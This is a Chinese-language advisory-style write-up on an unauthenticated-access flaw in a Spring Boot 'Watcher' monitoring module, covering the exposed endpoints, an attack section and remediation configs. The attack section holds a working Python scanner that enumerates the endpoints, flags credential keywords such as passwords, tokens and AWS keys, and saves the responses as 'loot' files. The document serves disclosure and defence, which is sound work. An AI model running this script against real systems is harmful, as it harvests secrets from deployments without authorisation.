Spring Boot Watcher 未授权访问漏洞
- [1. 漏洞基础信息](#1. 漏洞基础信息)
- [2. 漏洞影响范围](#2. 漏洞影响范围)
- [3. 攻击手法](#3. 攻击手法)
- [4. 漏洞修复](#4. 漏洞修复)
-
- [4.1 生产环境直接关闭 Watcher](#4.1 生产环境直接关闭 Watcher)
- [4.2 Spring Security 拦截](#4.2 Spring Security 拦截)
- [4.3 通过 ng 等网关拦截](#4.3 通过 ng 等网关拦截)
1. 漏洞基础信息
- 漏洞名称:Spring Boot Watcher 未授权访问漏洞
- 组件简介: Watcher 是一类基于 Spring Boot 的应用监控/巡检组件,对外暴露应用运行时信息。其设计目标与 Spring Boot Actuator、JavaMelody 类似,用于运维人员在生产环境快速排查系统问题。Watcher 通常以一个总入口(如
/watcher/starter)作为索引页,列出所有可访问的子端点 - 漏洞类型:未授权访问 / 敏感信息泄露(CWE-285、CWE-200、CWE-538)
- 漏洞本质: Watcher 模块在默认部署场景下不携带任何鉴权机制。当开发者在集成时未通过 Spring Security、过滤器、网关或反向代理对 /watcher/ 路径进行访问控制时,所有监控子端点(包括系统信息、线程、内存、磁盘、JDBC 连接信息等)均可被任意访问者直接获取,造成大规模敏感信息泄露,并为后续攻击提供完整情报
2. 漏洞影响范围
集成 Watcher 模块但未对 /watcher/ 配置访问控制策略的应用
访问 /watcher/starter 后,通常可看到如下索引页:
- sysinfo 系统信息(OS、内核、CPU、主机名等)
- threadinfo 线程概览(数量、状态分布)
- threadlist 线程明细(堆栈、锁、ThreadName)
- meminfo JVM 内存使用情况
- mempoolinfo 内存池详情(Eden、Survivor、Old、Metaspace)
- gcinfo GC 收集器信息与回收统计
- sysenv 系统环境变量(含敏感凭据)
- sysprops JVM 系统属性(含路径、用户名等)
- diskSize 磁盘空间与挂载点
- connectionInfo 数据库连接池、JDBC URL、用户名等
- jmapHistoInfo 类实例直方图(类名、对象数、占用大小)
- custom_index 业务自定义监控指标
- count_index 调用次数统计
3. 攻击手法
编写自动化利用脚本:
python
import requests
import json
ENDPOINTS = [
"sysinfo", "threadinfo", "threadlist", "meminfo", "mempoolinfo",
"gcinfo", "sysenv", "sysprops", "diskSize", "connectionInfo",
"jmapHistoInfo", "custom_index", "count_index"
]
SENSITIVE_KEYS = ["password", "secret", "token", "key", "jdbc", "passwd",
"AWS", "AK", "SK", "nacos"]
def scan(target):
print(f"[+] Target: {target}")
if requests.get(f"{target}/watcher/starter", timeout=5).status_code != 200:
print("[-] Not vulnerable")
return
for ep in ENDPOINTS:
try:
r = requests.get(f"{target}/watcher/{ep}", timeout=10)
if r.status_code == 200:
content = r.text
hits = [k for k in SENSITIVE_KEYS if k.lower() in content.lower()]
tag = f" [HIT: {','.join(hits)}]" if hits else ""
print(f"[+] /watcher/{ep} OK ({len(content)} bytes){tag}")
with open(f"loot_{ep}.json", "w") as f:
f.write(content)
except Exception as e:
print(f"[-] /watcher/{ep} error: {e}")
if __name__ == "__main__":
scan("http://target.com")4. 漏洞修复
4.1 生产环境直接关闭 Watcher
yaml
# application-prod.yml
watcher:
enabled: false
spring:
autoconfigure:
exclude:
- com.xxx.watcher.WatcherAutoConfiguration4.2 Spring Security 拦截
java
@Configuration
public class WatcherSecurityConfig {
@Bean
public SecurityFilterChain watcherFilterChain(HttpSecurity http) throws Exception {
http
.securityMatcher("/watcher/**")
.authorizeHttpRequests(auth -> auth
.anyRequest().hasRole("OPS_ADMIN")
)
.httpBasic(Customizer.withDefaults())
.csrf(csrf -> csrf.disable());
return http.build();
}
}